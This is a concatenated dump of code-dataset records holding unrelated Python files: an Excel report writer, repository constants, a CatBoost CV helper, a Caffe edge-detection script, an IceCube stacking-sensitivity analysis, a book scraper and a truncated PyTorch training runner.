Task_info.clear()\n\n return Task_datas.Tasks, Bug_dates.Tasks\n\n\ndef write_excel(bugs,tasks):\n global book_path\n global strLocalFolder\n wb = openpyxl.load_workbook(book_path)\n wb.worksheets[0].cell(row = 1 ,column= 1).value = VersionID + '(注意事项)'\n\n\n ws_bug = wb.worksheets[1]\n\n # 复制单元格格式\n font_1 = Font(name='宋体', charset=134, family=None, b=False, i=False, strike=None, outline=None, shadow=None, condense=None, color=None, extend=None, sz=10.0, u=None, vertAlign=None, scheme=None)\n Border_1 = Border(outline=True, diagonalUp=False, diagonalDown=False, start=None, end=None,\n left=Side(style='thin', color = BLACK),\n right=Side(style='thin', color = BLACK),\n top=Side(style='thin', color = BLACK),\n bottom=Side(style='thin', color = BLACK),\n diagonal=Side(style=None, color=None),\n diagonal_direction=0,\n )\n # Border_1 = ws_bug.cell(row=4, column=2).border\n # print('边框样式')\n # print(Border_1)\n\n # 靠右缩进\n Alignment_1 = Alignment(horizontal=None, vertical=None, textRotation=0, wrapText=None, shrinkToFit=None, indent=0.0, relativeIndent=0.0, justifyLastLine=None, readingOrder=0.0)\n # 居中缩进\n Alignment_2 = Alignment(horizontal='center', vertical='center', textRotation=0, wrapText=True, shrinkToFit=None, indent=0.0, relativeIndent=0.0, justifyLastLine=None, readingOrder=0.0)\n # print('缩进样式')\n # print(Alignment_1)\n\n\n a = 3\n for bug in bugs:\n ws_bug.delete_rows(a)\n ws_bug.cell(row=a, column=1).value = '日常业务'\n ws_bug.cell(row=a, column=1).font = font_1\n ws_bug.cell(row=a, column=1).alignment = Alignment_2\n ws_bug.cell(row=a, column=1).border = Border_1\n\n ws_bug.cell(row=a, column=2).value = '批量做账'\n ws_bug.cell(row=a, column=2).font = font_1\n ws_bug.cell(row=a, column=2).alignment = Alignment_2\n ws_bug.cell(row=a, column=2).border = Border_1\n\n ws_bug.cell(row=a, column=5).value = VersionID\n ws_bug.cell(row=a, column=5).font = font_1\n ws_bug.cell(row=a, column=5).alignment = Alignment_2\n ws_bug.cell(row=a, column=5).border = Border_1\n\n ws_bug.cell(row=a, column=6).value = '否'\n ws_bug.cell(row=a, column=6).font = font_1\n ws_bug.cell(row=a, column=6).alignment = Alignment_2\n ws_bug.cell(row=a, column=6).border = Border_1\n\n ws_bug.cell(row=a, column=7).value = '无'\n ws_bug.cell(row=a, column=7).font = font_1\n ws_bug.cell(row=a, column=7).alignment = Alignment_2\n ws_bug.cell(row=a, column=7).border = Border_1\n\n ws_bug.cell(row=a, column=8).value = bug['需求提出方']\n ws_bug.cell(row=a, column=8).font = font_1\n ws_bug.cell(row=a, column=8).alignment = Alignment_2\n ws_bug.cell(row=a, column=8).border = Border_1\n\n ws_bug.cell(row=a, column=9).value = bug['任务编号']\n ws_bug.cell(row=a, column=9).font = font_1\n ws_bug.cell(row=a, column=9).alignment = Alignment_2\n ws_bug.cell(row=a, column=9).border = Border_1\n a += 1\n\n ws_task = wb.worksheets[2]\n a = 3\n for task in tasks:\n ws_task.delete_rows(a)\n\n ws_task.cell(row=a,column= 1).value = '日常业务'\n ws_task.cell(row=a, column= 1).font = font_1\n ws_task.cell(row=a, column= 1).alignment = Alignment_2\n ws_task.cell(row=a, column= 1).border = Border_1\n\n ws_task.cell(row=a,column= 2).value = '批量做账'\n ws_task.cell(row=a, column= 2).font = font_1\n ws_task.cell(row=a, column= 2).alignment = Alignment_2\n ws_task.cell(row=a, column= 2).border = Border_1\n\n ws_task.cell(row=a,column= 4).value = '否'\n ws_task.cell(row=a, column= 4).font = font_1\n ws_task.cell(row=a, column= 4).alignment = Alignment_2\n ws_task.cell(row=a, column= 4).border = Border_1\n\n ws_task.cell(row=a,column= 5).value = '无'\n 
ws_task.cell(row=a, column= 5).font = font_1\n ws_task.cell(row=a, column= 5).alignment = Alignment_2\n ws_task.cell(row=a, column= 5).border = Border_1\n\n ws_task.cell(row=a,column= 6).value = task['需求提出方']\n ws_task.cell(row=a, column= 6).font = font_1\n ws_task.cell(row=a, column= 6).alignment = Alignment_2\n ws_task.cell(row=a, column= 6).border = Border_1\n\n ws_task.cell(row=a,column= 7).value = task['需求编号']\n ws_task.cell(row=a, column= 7).font = font_1\n ws_task.cell(row=a, column= 7).alignment = Alignment_2\n ws_task.cell(row=a, column= 7).border = Border_1\n\n a += 1\n book_path = strLocalFolder + r'\\估值_'+VersionID+r'升级说明-相泽峰 .xlsx'\n wb.save(book_path)\n\n\n\n\ndef main():\n global VersionID\n print(strDes)\n VersionID = input('请输入版本号:')\n _init()\n data=[]\n data.append(read_excel()[0])\n data.append(read_excel()[1])\n write_excel(data[1],data[0])\n\nif __name__ == '__main__':\n main()","sub_path":"release/excel_mate -原始版本.py","file_name":"excel_mate -原始版本.py","file_ext":"py","file_size_in_byte":8630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"446649588","text":"# Copyright 2020 Red Hat, Inc.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\n\nRHOS_VERSIONS_SEARCH_PATHS = [\n \"/usr/share/rhos-bootstrap\",\n \"/usr/local/share/rhos-bootstrap\",\n os.path.join(sys.prefix, \"share\", \"rhos-bootstrap\"),\n]\n\nYUM_REPO_BASE_DIR = \"/etc/yum.repos.d\"\n\nDEFAULT_MIRROR_MAP = {\n \"fedora\": \"https://mirrors.fedoraproject.org\",\n \"centos\": \"http://mirror.centos.org\",\n \"ubi\": \"http://mirror.centos.org\",\n \"rhel\": \"https://trunk.rdoproject.org\",\n \"rdo\": \"https://trunk.rdoproject.org\",\n}\n\nCENTOS_RELEASE_MAP = {\"centos8\": \"8\", \"centos8-stream\": \"8-stream\"}\n\nCENTOS_REPO_MAP = {\n \"baseos\": \"BaseOS\",\n \"appstream\": \"AppStream\",\n \"highavailability\": \"HighAvailability\",\n \"nfv\": \"nfv\",\n \"powertools\": \"PowerTools\",\n \"rt\": \"RT\",\n \"virt\": \"virt\",\n}\n\nSUPPORTED_REPOS = [\n \"ansible\",\n \"ceph\",\n \"delorean\",\n \"openstack\",\n \"openvswitch\",\n \"satellite\",\n \"virt\",\n]\n","sub_path":"rhos_bootstrap/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"41587231","text":"# author: Heo Sung Wook\n\nimport catboost as cbt\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\n\ndef cbt_cv_predict(data, new_data, params, iterations, cv, valid_prop, target, isReg, eval_metric=\"AUC\", stopping_tolerance=0.01, stopping_rounds=10):\n # check where Regression or not\n if isReg == True:\n mdl = cbt.CatBoostRegressor(use_best_model=True,\n iterations=iterations,\n eval_metric=eval_metric,\n od_type=\"Iter\",\n od_pval=stopping_tolerance,\n od_wait=stopping_rounds,\n random_seed=1234)\n else:\n mdl = cbt.CatBoostClassifier(use_best_model=True,\n iterations=iterations,\n 
eval_metric=eval_metric,\n od_type=\"Iter\",\n od_pval=stopping_tolerance,\n od_wait=stopping_rounds,\n random_seed=1234)\n \n predsTest = 0\n for i in range(0, cv): \n # Prepare the data set for fold\n trainData, validData = train_test_split(data, \n test_size=valid_prop, \n stratify=data[target], \n random_state = (i+1)) \n \n \n trainLabel = trainData[target]\n trainData.drop(target, axis = 1, inplace = True)\n \n validLabel = validData[target]\n validData.drop(target, axis = 1, inplace = True)\n \n # for specifying index of categorical columns\n categorical_features_indices = np.where((trainData.dtypes == \"category\") | (trainData.dtypes == \"object\"))[0]\n \n \n ml_cbt = mdl.fit(X=trainData, \n y=trainLabel, \n cat_features=categorical_features_indices,\n eval_set=(validData, validLabel),\n verbose=False,\n plot=False)\n \n # Predict\n predsTest += ml_cbt.predict(new_data)/cv\n\n return ml_cbt, predsTest\n\n\n\"\"\"\n##### example #####\n## after run \"tuneCBT.py\" example code \n\n\ncbt_model, pred = cbt_cv_predict(data = train, \n new_data = test,\n params = bestParams, \n iterations = 1000, \n cv = 12,\n isReg = False,\n valid_prop = 0.4, \n target = \"Survived\",\n stopping_rounds = 50)\n\"\"\"","sub_path":"Kaggle/mlmc/Python/CatBoost/cbt_cv_predict.py","file_name":"cbt_cv_predict.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"312121638","text":"import numpy as np\nimport scipy.misc\nimport Image\nimport os\nimport cv2\nimport skimage.exposure as exposure\n\n# Make sure that caffe is on the python path:\ncaffe_root = '../../' # this file is expected to be in {caffe_root}/examples/hed/\nimport sys\nsys.path.insert(0, caffe_root + 'python')\n\nimport caffe\n\n# data_root = '../../data/HED-BSDS/'\ndata_root = '../../data/'\nwith open(data_root+'test.lst') as f:\n test_lst = f.readlines()\n \ntest_lst = [data_root+x.strip() for x in test_lst]\n\nim_lst = []\nfor i in range(0, len(test_lst)):\n im = Image.open(test_lst[i])\n # in_ = np.array(im, dtype=np.uint8)\n in_ = np.array(im, dtype=np.float32)\n if in_.shape[2]>3:\n in_ = in_[:,:,:3] # remove alpha channel\n in_ = in_[:,:,::-1] # rgb to bgr\n # in_=exposure.equalize_adapthist(in_, kernel_size=None, clip_limit=0.2, nbins=64) # enhance\n in_ = in_/np.max(in_)*255.0\n in_ -= np.array((104.00698793,116.66876762,122.67891434))\n im_lst.append(in_)\n\nidx = 3\nin_ = im_lst[idx]\nin_ = in_.transpose((2,0,1)) # HWC to CHW\n#remove the following two lines if testing with cpu\n# caffe.set_mode_gpu()\n# caffe.set_device(0)\n# load net\nmodel_root = './'\nnet = caffe.Net(model_root+'deploy.prototxt', model_root+'hed_pretrained_bsds.caffemodel', caffe.TEST)\n# shape for input (data blob is N x C x H x W), set data\nnet.blobs['data'].reshape(1, *in_.shape)\nnet.blobs['data'].data[...] 
= in_\n# run net and take argmax for prediction\nnet.forward()\nout1 = net.blobs['sigmoid-dsn1'].data[0][0,:,:]\nout2 = net.blobs['sigmoid-dsn2'].data[0][0,:,:]\nout3 = net.blobs['sigmoid-dsn3'].data[0][0,:,:]\nout4 = net.blobs['sigmoid-dsn4'].data[0][0,:,:]\nout5 = net.blobs['sigmoid-dsn5'].data[0][0,:,:]\nfuse = net.blobs['sigmoid-fuse'].data[0][0,:,:]\n\nmerge = (out1+out2+out3+out4+out5+fuse)/6.0\nprint(np.max(merge))\ncv2.imwrite(test_lst[idx][:-4]+\"-res.png\",merge/np.max(merge)*255)\ncv2.imwrite(test_lst[idx][:-4]+\"-res-out3.png\",out3/np.max(out3)*255)\n\n\n# process the watershed\nfrom skimage.morphology import watershed, disk\nfrom scipy import ndimage as ndi\nbd = int(out3.shape[1]/20)\nout3[:,:bd] = 0\nout3[:,-bd:-1] = 0\nmarkers = out3 < 0.05 # 0.05\nmarkers = ndi.label(markers)[0]\nlabels = watershed(out3, markers)\ncv2.imwrite(test_lst[idx][:-4]+\"-label.png\",labels)\n\n# binary processing\nuniq = np.unique(labels[:,-1],return_counts=True)\nbg = uniq[0][np.argmax(uniq[1])]\nbinary = 255*(labels!=bg)\ncv2.imwrite(test_lst[idx][:-4]+\"-bin.png\",binary)\n\n# scale_lst = [fuse]\n# plot_single_scale(scale_lst, 22)\n# scale_lst = [out1, out2, out3, out4, out5]\n# plot_single_scale(scale_lst, 10)\n","sub_path":"examples/hed/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"608262493","text":"import ah_db\nimport sys,traceback\nsys.path.append( '/opt/services/activehours/python-services')\nfrom modeling.feature.feature_generic import FeatureGeneric\n\n\nclass EmploymentFeature(FeatureGeneric):\n nWkMax=20\n\n def buildFeatures(self,predTime):\n f={}\n try:\n lastIndex=self.getDataRangeIndex(predTime)\n\n f['nUserEmployment']=lastIndex+1 #len(self.data) #should normalize by wksincesignup\n f['daySinceLastEmployment']=EmploymentFeature.nWkMax*7\n\n\n f['employer']=-1\n f['paytypeid']=-1\n f['nEmployer']=0\n if lastIndex>=0:\n f['employer']=self.data[lastIndex]['employerid']\n f['paytypeid']=self.data[lastIndex]['paytypeid']\n\n try:\n f['daySinceLastEmployment']=(predTime-self.data[lastIndex]['CreatedOn']).days\n except:\n f['daySinceLastEmployment']=EmploymentFeature.nWkMax*7\n\n\n employer={}\n\n\n for i in range(lastIndex+1):\n l=self.data[i]\n\n employer[l['employerid']]=1\n\n\n f['nEmployer']=len(employer)\n except:\n print(lastIndex,self.data)\n traceback.print_exc()\n\n self.reName(f,'employment_')\n return f\n\n def getData(self):\n sql='''\n SELECT userid, employerid, paytypeid,\n LastUpdatedOn AS CreatedOn\n FROM UserEmploymentDetails\n WHERE userid=%s\n ORDER BY LastUpdatedOn\n '''\n\n return ah_db.execute_to_json('miscellaneous', sql, (self.uid,))\n","sub_path":"src/modeling/feature/feature_employment.py","file_name":"feature_employment.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"327066965","text":"import json\nimport ast\n\n\nclass Preference:\n \"\"\"\n Retrieves or return user preferences.\n the information is stored in a file named \"preferences.txt\"\n \"\"\"\n\n @staticmethod\n def get_all_pref():\n with open('preference.txt', 'rb') as doc_read:\n dictionary = json.loads(doc_read.read().decode('utf-8'))\n return dictionary\n\n def get_pref(self, pref):\n dictionary = self.get_all_pref()\n if dictionary[pref] == \"\":\n return\n else:\n return dictionary[pref]\n\n @staticmethod\n def reset_pref():\n result = ['Default folder', 
'Delete folder']\n for a in result:\n Preference().set_pref(a, '')\n\n def set_pref(self, pref, value):\n value = value.strip()\n dictionary = self.get_all_pref()\n dictionary[pref] = value\n with open('preference.txt', 'wb') as doc_write:\n dic_str = json.dumps(dictionary).encode('utf-8')\n doc_write.write(bytes(dic_str))\n\n @staticmethod\n def get_extension():\n list_data = []\n return list_data\n\n @staticmethod\n def change_extension(list_data):\n \"\"\"\n :param list_data: a retrieved data list\n \"\"\"\n with open('extbis.txt', 'rb') as extension_dict :\n dictionary = ast.literal_eval(extension_dict.read().decode())\n for element in list_data:\n dictionary[element[0]] = (element[1], element[2], element[3])\n dictionary = json.dumps(dictionary).encode('utf-8')\n with open('extbis.txt', 'wb') as extension_dict_2:\n extension_dict_2.write(bytes(dictionary))\n","sub_path":"Parameters/preference.py","file_name":"preference.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"38243153","text":"#!/cvmfs/icecube.opensciencegrid.org/py3-v4/RHEL_7_x86_64/bin/python\n\nimport os, time\n#CSKY IMPORTS\nimport csky as cy\nfrom csky.hyp import PowerLawFlux\nfrom csky.utils import Arrays\n#OTHER IMPORTS\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport histlite as hl\nfrom astropy.time import Time\nimport random\nimport argparse\n\n################################################################################\n# DEFINITIONS\n################################################################################\ndef Write2File(msg,logfile):\n if logfile!=\"\":\n log = open(logfile, \"a\")\n log.write(msg+\"\\n\")\n log.close()\n else:\n print(\"WARNING: File path empty, nothing is written\")\n return\n\ndef computing_fluxes_from_ns(trials,sens_disc_arr,pivot_energy,units):\n ednde = trials.to_dNdE(sens_disc_arr['n_sig'], E0=pivot_energy, unit=units)\n ednde_err = trials.to_dNdE(sens_disc_arr['n_sig_error'], E0=pivot_energy, unit=units)\n e2dnde = trials.to_E2dNdE(sens_disc_arr['n_sig'], E0=pivot_energy, unit=units)\n e2dnde_err = trials.to_E2dNdE(sens_disc_arr['n_sig_error'], E0=pivot_energy, unit=units)\n return ednde,ednde_err,e2dnde,e2dnde_err\n################################################################################\n# INPUT SECTION\n################################################################################\n#############\n# ARGUMENTS #\n#############\np = argparse.ArgumentParser(description=\"Calculates Sensitivity and Discovery\"\n \" Potential Fluxes for the MOJAVE AGN Radio stacking analysis\",\n formatter_class=argparse.RawTextHelpFormatter)\np.add_argument(\"--pivot_energy\", default=100.0, type=float,\n help=\"Pivot energy in TeV (E0) (default=100.0)\")\np.add_argument(\"--index\", default=2.0, type=float,\n help=\"Spectral Index (default=2.0)\")\np.add_argument(\"--wrkdir\", default=\"result_dir\", type=str,\n help=\"Output directory (default:result_dir)\")\np.add_argument(\"--equal_weights\", default=False, \n help=\"Equal weights for stacking? If no then average fluxes are used. 
(default:False)\")\np.add_argument(\"--nscramble\", default=1000, type=int,\n help=\"Number of background only scrambles used \"\n \"to measure TS distribution (default=1000)\")\np.add_argument(\"--nsample\", default=100, type=int,\n help=\"Batch size for sensitivity and discovery potential calculation \")\np.add_argument(\"--make_background_plot\", default=False,\n help=\"Make plot of background trials (defaut:False)\")\np.add_argument(\"--inj_energy\", default=\"1e0_1e1\", type=str, \n help=\"Energy bin in TeV to use for computing differential sensitivity in form of string 1e0_1e1 (default)\")\np.add_argument(\"--nstep\", default=5, type=int,\n help=\"Number of signal injection steps (default=5)\")\np.add_argument(\"--input_file\", default=\"../MOJAVE_multiyear_complete_sample.txt\", type=str,\n help=\"Location of input file: MOJAVE_multiyear_complete_sample.txt\")\np.add_argument(\"--ana_dir_path\", default=\"../cache/\", type=str,\n help=\"Location of analysis directory. (Default:../cache/)\")\np.add_argument(\"--discovery_thresh\", default=5, type=float,\n help=\"Discovery threshold in sigma (default=5)\")\np.add_argument(\"--cpus_used\",default = 2, type=int,help = 'number of cpus to be used (default 2)')\n\nargs = p.parse_args()\n#############\n# ARGUMENTS #\n############# \npivot_energy = args.pivot_energy\nindex = args.index\nwrkdir = args.wrkdir\nequal_weights = args.equal_weights\nnscramble = args.nscramble\nnsample = args.nsample\nmake_background_plot =args.make_background_plot\ninj_energy = args.inj_energy\nnstep = args.nstep\ninput_file = args.input_file\nana_dir_path = args.ana_dir_path\ndiscovery_thresh = args.discovery_thresh\ncpus_used = args.cpus_used\n\nif not os.path.exists(wrkdir):\n os.makedirs(wrkdir)\nGeV = 1. # base SkyLab and csky energy units are in GeV mostly\nTeV = 1000*GeV \nE0 = pivot_energy*TeV # pivot energy \ninj_enj_lo = (float(inj_energy[:3]))*TeV # inj energy LL\ninj_enj_hi = (float(inj_energy[4:]))*TeV # inj energy UL \nprint(\"Min max inj energy in GeV\")\nprint(inj_enj_lo,inj_enj_hi)\n\n################################################################################\n# GET MOJAVE DATA SET (NAME RA DEC av_flux pk_flux)SET Directory\n################################################################################\narray = np.loadtxt(input_file,dtype='str')\nsrc_name = np.asarray(array[:,0])\nsrc_ra = np.asarray(array[:,1],dtype=float)*np.pi/180\nsrc_dec = np.asarray(array[:,2],dtype=float)*np.pi/180\nflux_used = np.asarray(array[:,3],dtype=float)\nprint(\"---------------------------------------------------------\\n\")\nprint(\"Number of sources used in stacking: %s\"%(len(flux_used)))\nprint(\"---------------------------------------------------------\\n\")\nno_of_sources = len(flux_used)\n\n################################################################################\n# Weights!\n################################################################################\nif equal_weights:\n wt = np.ones(len(flux_used))\nelse:\n wt = np.copy(flux_used)\nwt=wt/np.sum(wt)\nprint(\"\\n WEIGHTS USED FOR THIS RUN:\\n %s \\n\"%(wt))\n\n################################################################################\n# CSKY SETUP and LOAD ICECUBE DATA\n################################################################################\nana_dir = cy.utils.ensure_dir(ana_dir_path)\nrepo = cy.selections.repo\nana = cy.get_analysis(cy.selections.repo, cy.selections.PSDataSpecs.ps_10yr, dir=ana_dir)\nif(os.path.isdir(ana_dir)==True):\n print(\"Not saving analysis cache as 
folder exists\")\nelse:\n    print(\"Saving analysis cache to \",ana_dir)\n    ana.save(ana_dir)\ncy.CONF['ana'] = ana\ncy.CONF['mp_cpus'] = cpus_used\n\n################################################################################\n# CSKY SOURCE DESCRIPTION\n################################################################################\nsrc = cy.utils.Sources(ra=src_ra,dec=src_dec,weight=wt,deg=False)\nflux = cy.hyp.PowerLawFlux(gamma=index,norm=E0,energy_range=(inj_enj_lo,inj_enj_hi))\n\n################################################################################\n# SET UP TRIAL RUNNER\n################################################################################\ntimer = cy.timing.Timer()\ntime = timer.time\nwith time('trial runner construction'):\n    tr = cy.get_trial_runner(src=src, ana=ana,flux=flux, sindec_bandwidth=np.radians(.1), mp_cpus=cpus_used)\n\n################################################################################\n# BACKGROUND\n################################################################################\nbkgfile_comb= wrkdir+\"/bkg_files/background_for_index_%s_energy_inj_%s.npy\"%(index,inj_energy)\nif(os.path.isfile(bkgfile_comb)==True):\n    bg_arr=np.load(bkgfile_comb)\n    bg = cy.dists.Chi2TSD(cy.utils.Arrays(init=bg_arr))\nelse:\n    print(\"computing background:\")\n    bg_arr = tr.get_many_fits(nscramble, seed=random.randint(1, 1000))\n    bg = cy.dists.Chi2TSD(bg_arr)\n    np.save(bkgfile_comb,bg_arr.as_array)\nprint(bg.description)\n \nif make_background_plot:\n    fig, ax = plt.subplots()\n    h = bg.get_hist(bins=30)\n    hl.plot1d(ax, h, crosses=True, label='{} bg trials'.format(bg.n_total))\n    x = h.centers[0]\n    norm = h.integrate().values\n    ax.semilogy(x, norm * bg.pdf(x), lw=1, ls='--',label=r'$\\chi^2[{:.2f}\\ dof,\\ \\eta={:.3f}]$'.format(bg.ndof, bg.eta))\n\n    ax.set_xlabel(r'TS')\n    ax.set_ylabel(r'number of trials')\n    ax.legend()\n    plt.tight_layout()\n    plt.savefig(wrkdir+\"background_plot_for_index_%s_energy_bin_%s.png\"%(index,inj_energy))\n\n################################################################################\n# SENSITIVITY\n################################################################################\nsens = tr.find_n_sig(\n    bg.median(), 0.9, #90%\n    n_sig_step=nstep,\n    batch_size=nsample,\n    max_batch_size=nsample,\n    tol=0.05 #Change tolerance if required\n    )\n\n    \n# geometric mean of the injection energy bin edges, in TeV (numpy is already imported)\ne_mid=10**((np.log10(inj_enj_lo/1000)+np.log10(inj_enj_hi/1000))/2)\n\nednde,ednde_err,e2dnde,e2dnde_err = computing_fluxes_from_ns(tr,sens,e_mid,1e3)\nprint(\"\\nSensitivity Flux in TeV/cm2/s @ %s TeV:\"%(E0/TeV))\nprint(e2dnde,\"+-\",e2dnde_err)\n\n\n# SAVE RESULTS TO COMMON FILE\n# Column names E_range gamma e_norm sensflux(e2dnde)calc sensflux(e2dnde)err\nout_line=\"%s\\t%s\\t%s\\t%.2e\\t%.2e\\t%s\"%(inj_energy,index,e_mid,e2dnde,e2dnde_err,\"TeV/cm2/s\")\ncombresult_file= wrkdir+\"/sens_combined_result_file_index_%s.txt\"%(index)\nif(os.path.isfile(combresult_file)!=True):\n    Write2File(\"E_range\\tgamma\\te_norm\\tsensflux(E2dnde)calc\\tsensflux(E2dnde)err\",combresult_file)\nWrite2File(out_line,combresult_file)\n\n################################################################################\n# DISCOVERY POTENTIAL\n################################################################################ \ndisc = tr.find_n_sig(bg.isf_nsigma(discovery_thresh), \n                    0.5, #50%\n                    n_sig_step=nstep, \n                    batch_size=nsample, \n                    tol=0.05) #Change tolerance if required\n\n\nednde,ednde_err,e2dnde,e2dnde_err = computing_fluxes_from_ns(tr,disc,e_mid,1e3)\nprint(\"\\n DP Flux in TeV/cm2/s @ %s 
TeV:\"%(E0/TeV))\nprint(e2dnde,\"+-\",e2dnde_err)\n\n\n# SAVE RESULTS TO COMMON FILE\n# Column names E_range gamma e_norm dpflux(e2dnde)calc dpflux(e2dnde)err\n \nout_line=\"%s\\t%s\\t%s\\t%.2e\\t%.2e\\t%s\"%(inj_energy,index,e_mid,e2dnde,e2dnde_err,\"TeV/cm2/s\")\ncombresult_file=wrkdir+ \"/dp_combined_result_file_index_%s.txt\"%(index)\nif(os.path.isfile(combresult_file)!=True):\n    Write2File(\"E_range\\tgamma\\te_norm\\tdpflux(E2dnde)calc\\tdpflux(E2dnde)err\",combresult_file)\nWrite2File(out_line,combresult_file)\n","sub_path":"differential_sensitivity_discovery_potential/mojave_time_independent_analysis_variable_einj.py","file_name":"mojave_time_independent_analysis_variable_einj.py","file_ext":"py","file_size_in_byte":9911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
+{"seq_id":"590457287","text":"from collections import namedtuple\n\nfrom scraper.book_scraper import BookScraper\nfrom utils.date_handler import DateHandler\nfrom utils.manning_string_handler import ManningStringHandler\n\nMeapBookDetails = namedtuple('MeapBookDetails', ['isbn',\n                                                 'author_list',\n                                                 'price',\n                                                 'num_pages',\n                                                 'forum_url',\n                                                 'thumbnail_url',\n                                                 # Only meap book\n                                                 'meap_began_month_year',\n                                                 'estimated_publication_month_year',\n                                                 'percent_done'])\n\n\nclass MeapBookScraper(BookScraper):\n\n    def __init__(self, url):\n        super(MeapBookScraper, self).__init__(url)\n\n    def get_book_details(self):\n        meap_book_details = MeapBookDetails(\n            isbn=self._get_isbn(),\n            author_list=self._get_author_list(),\n            price=self._get_price_list(),\n            num_pages=self._get_num_pages(),\n            forum_url=self._get_forum_url(),\n            thumbnail_url=self._get_thumbnail_url(),\n            # Only published book\n            meap_began_month_year=self._get_meap_began_month_year(),\n            estimated_publication_month_year=self._get_estimated_publication_month_year(),\n            percent_done=self._get_percent_done()\n        )\n        return meap_book_details\n\n    def _get_estimated_publication_month_year(self):\n        for line in self._product_info:\n            if ManningStringHandler.get_estimated_publication_month_year_in(line):\n                return ManningStringHandler.get_estimated_publication_month_year_in(line)\n\n    def _get_meap_began_month_year(self):\n        for line in self._product_info:\n            if ManningStringHandler.get_meap_began_month_year_in(line):\n                return DateHandler.convert_month_year_string_to_date(ManningStringHandler.get_meap_began_month_year_in(line))\n\n    def _get_percent_done(self):\n        if self._beautiful_soup_object.find('div', {'class': 'progress-bar progress-bar-success'}):\n            return int(self._beautiful_soup_object.find('div', {'class': 'progress-bar progress-bar-success'}).attrs[\n                'aria-valuenow'])\n","sub_path":"manning/scraper/meap_book_scraper.py","file_name":"meap_book_scraper.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"}
+{"seq_id":"412437379","text":"# E.g.\n# \tpython e2e_runner.py --geom '100 100 100 100 1000 700 ; ; 1700 800 300 70' --lr 0.001\n\nshared = __import__(__package__ or '__init__')\n\n\nimport sys\nimport os\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nimport torch.utils.data.sampler as sampler\n\nimport dataset.faster_rcnn as data\nimport unrel.unrel_model as unrel\nimport classifier.generic_solver as generic_solver\nimport classifier.classifier as cls\nfrom classifier.loss_calculator import LossCalculator\n\nimport pdb\n\nparser = shared.parser\nparser.add_option('--bp_every', dest='backprop_every', default=64, type='int') # 
Don't backprop on every 'batch'. Instead backprop after multiple batches.\nparser.add_option('--nowt', dest='weighted_loss', action='store_false', default=True)\nassert parser.has_option('--lr')\nparser.defaults['lr'] = 0.00001\nassert parser.has_option('--bs')\nparser.defaults['batch_size'] = 1\nassert parser.has_option('--tbs')\nparser.defaults['test_batch_size'] = 1\nassert parser.has_option('--outdir')\nparser.defaults['outdir'] = 'log/e2e/vgg16'\nassert parser.has_option('--geom')\nparser.defaults['geometry'] = '1400 600 300 70'\nassert parser.has_option('--test_every')\nparser.defaults['test_every'] = 1024\n\nclass Model(unrel.Model):\n\tdef __init__(self, n_vis_features, *args, **kwargs):\n\t\tsuper(Model, self).__init__(*args, **kwargs)\n\t\tself.classifier = nn.Sequential(*(list(self.classifier.children())[:-1] + [nn.Linear(4096, n_vis_features)])) # Replace last layer of classifier for our desired output dimension\n\t\tgeom = [ int(x) for x in kwargs['opts'].geometry.split() ]\n\t\tself.apperance_normalizer = nn.BatchNorm1d( 500 )\n\t\tself.predicate_classifier = cls.sequential( geom, batchnorm=False )\n\n\tdef forward(self, batch):\n\t\tappearance_features = super(Model, self).forward(batch)\n\t\tif appearance_features.dim() < 2:\n\t\t\tprint('Uh oh. Weird appearance features batch %s' % (str(appearance_features.shape),))\n\t\t\tappearance_features.unsqueeze_(0)\n\t\tappearance_features = self.apperance_normalizer( appearance_features )\n\t\t# Get spatial features\n\t\tspatial_features = batch['spatial'].float().cuda()\n\t\tif len(spatial_features.shape) > 2: spatial_features.unsqueeze_(0) # kludge. find out why dimensions are inconsistent\n\t\t# Concatenate appearance and spatial features => visual features\n\t\tvisual_features = torch.cat( [spatial_features, appearance_features[0::2,:], appearance_features[1::2,:]], 1 )\n\t\t# Compute predicate prediction\n\t\tpredicate_scores = self.predicate_classifier(visual_features)\n\t\treturn predicate_scores\n\n\nclass Solver(generic_solver.GenericSolver):\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(Solver, self).__init__(*args, **kwargs)\n\t\tself.verbose = False\n\t\tself.optimizer.zero_grad()\n\t\tself.batch_example_ct = 0\n\n\tdef _train_step(self, batch):\n\t\tself.model.train()\n\t\tloss = self.train_loss(batch)\n\t\tloss.backward()\n\t\tself.batch_example_ct += batch['preds'].shape[0]\n\t\tif self.batch_example_ct >= self.opts.get('backprop_every'): # If this is not the first iteration and we have enough iterations to merit a backprop\n\t\t\tself.optimizer.step()\n\t\t\tself.optimizer.zero_grad()\n\t\t\tself.batch_example_ct = 0\n\t\tif self.iteration % self.print_every == 0:\n\t\t\tself._print('TRAIN_BCH', self.train_loss.end_batch())\n\t\tif self.scheduler and testloader is None:\n\t\t\tself.scheduler.step(loss.item())\n\t\treturn loss\n\nclass Runner(shared.Runner):\n\tdef setup_model(self):\n\t\tsuper(Runner, self).setup_model()\n\t\tself.model.cuda()\n\n\tdef _build_model(self, 